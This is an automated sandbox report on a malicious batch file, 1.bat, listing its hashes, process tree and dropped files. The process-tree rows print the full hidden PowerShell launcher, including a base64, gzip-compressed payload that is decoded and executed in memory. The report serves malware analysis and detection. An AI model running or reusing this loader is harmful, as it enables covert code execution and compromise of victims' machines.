Field | Value |
---|---|
File name | 1.bat |
Full analysis | https://app.any.run/tasks/22b6a3d3-0264-4f32-9e93-e4c7cce51e29 |
Verdict | Malicious activity |
Analysis date | March 22, 2019, 13:23:27 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators | |
MIME | text/plain |
File info | ASCII text, with very long lines |
MD5 | A12A2025F788C32202CF04A32CE85CAF |
SHA1 | FE3AF863337FACDA3CF74441C9E7499D01443EEC |
SHA256 | 0DC7EBED306D052A8E258B02419D67FD08AC6E8AA4F9AC1CABB1DBF3E76B9D19 |
SSDEEP | 48:VkW8aMMR33KM0bTzJw1wNBlrSl0vtffOm4JC9CVVYW/:2EnKPm1wNBppZfO/+C7YC |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1920 | cmd /c ""C:\Users\admin\AppData\Local\Temp\1.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
892 | cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b="powershell.exe";}else{$b=$env:windir+"\syswow64\WindowsPowerShell\v1.0\powershell.exe"};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAHVcP1kCA71WbY/aOBD+vJX6H6IKiUSlBFjafZEqnZMQYHlZIEt4O3TyJk7wYmI2cZaXXv/7TSDpstftXa8fLgLF9ow942eemYkXB46gPJBcnU8rId7UpC9v35z1cIhXkpwLB8O4HxWknCdWo/1VeTCeKGdnoJBz6vu9IX2W5Blarw2+wjSYX1/rcRiSQBznxToRKIrI6p5REsmK9Kc0WpCQfLi9fyCOkL5IuT+KdcbvMUvVdjp2FkT6gAI3kbW5gxPnitaaUSHnf/89r8w+lOfF2mOMWSTnrV0kyKroMpZXpK9KYvButyZyvkOdkEfcE8URDc4rxWEQYY904bQn0iFiwd0or8A14BcSEYeBdLxQcsJRLudh2Au5g1w3JBGoF5vBE18SORfEjBWk3+RZan4QB4KuCMgFCfnaIuETdUhUbODAZWRAvLncJZvs1j+7ST7dBFo9ESoFCMlrfna4GzNy3JpXvvc0jaMCz8tYAgZf3755+8bLaEDKk1MCwOhsdhgTcFPu8Yge1D5LpYLUAXtY8HAH09xdGBNlLs0S/GfzuZSLu37dK/z4gHKmDboRrmloKszLTTcG0czm1J3D1jREucjuJ8s/ZppBPBoQYxfgFXUyMsmvwU48Rg5XLWZqXfBNzqcC4hqEER+LBMeCNPt+W21Fxbe9WkyZS0LkQOgi8Aqiqrx05hgaOd8MOmQFWB3n+SQMQGGSaae03WXWkzko5XWGI8i/Xgw55BQki2BG3IKEgoimIhQLfhjmn93txExQB0ciO26upDCm5nQeRCKMHYgeXP3OWhOHYpYgUZAa1CXazqJ+Zjb/Kg46ZowGPpz0BHGAleT+lkg4EYKHx/grRYuI5mrNyAqUDslsMuxD6qb8P7AI+8TN/83DjN1HKidQZBic+AfxtRgXBcmmoYCSkMB6yqVfdOOkKiQO6SFJIyJn+TLTdiKheW7fbPnLsZEQOsPogEgoAA0z5CsNR+RT1RIhYCW/U2+pjuCZNAPWcbQlLaMNLTc78B/S8yY3LtzWzUNDDY3twkPNqNlp9Ix+o1F9urHsqrBqTdHqNUWnNn54sFBjMJyIaRM17mhpOanu1zd0b7WRO9mqn/baflPStvsH3/Umhuf5F541KH80aXuk97VSBbeNWtweaRutVI1qdNPo02F/eWOK+4nN8NBT/XH5CtNtO3ywy7yzbyJUX5w7+xvPri867m7SUK9G1SWqIaQHNdvUeGuihain2ti3ue7z1m7k60gzHUqm/aGp9fumhob1h0fjSvVh7xgvtJFdodP1eLCAuQkutNRStemSPZ/0AaQ6R9gfgI6vV5yFBzrGe6S97/KogpcaRxromNNH8GuyNnsM5HfDCkc2644xak93pqqWJ70qapToqO6j5Ejsa32Moidjb6hl2+Xu6GN34qn2mF2ohn63djxVVTcNo+VMy9vL24uqVnrUV3TF7iuuejW81IJNy+89+W5/dDHYdnf3YG+oqva7hDbAm9xObzs2GQXdKDqhxI+KfQeH0QIzoAoU8SxXTR6aaTnucZrskOXn7rwkYUAYtDRoehntEWPcSZpDUr2hLx27xRzSdgjD88qrI0X6pqg8t4xs6fp6Cp5C/mQEL7ZJ4ItFobQ9L5Wg+Je21RJc+udvqPP1Tv52XCFpIKdonZpiB1NKkmi56DLWKt7/gGWa5Qt4uf+C5fPaP0h/Ct9S4QUG30lfLvwnvH8NhRGmAtQtqFaMHFvnq2CkHDr51jgGCvjhpU/yvXcbiw9d+Aj5CyAqSIRnCgAA"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2820 | powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b="powershell.exe";}else{$b=$env:windir+"\syswow64\WindowsPowerShell\v1.0\powershell.exe"};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("…"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
PID | Process | Filename | Type |
---|---|---|---|
2820 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NT9RKPQA3YWQ4PUFTRZA.temp | — |
MD5: — | SHA256: — | ||
2820 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary |
MD5: 7100C9D54A32DFE02751A9E1BC41F804 | SHA256: 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | ||
2820 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf88de.TMP | binary |
MD5: 7100C9D54A32DFE02751A9E1BC41F804 | SHA256: 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | ||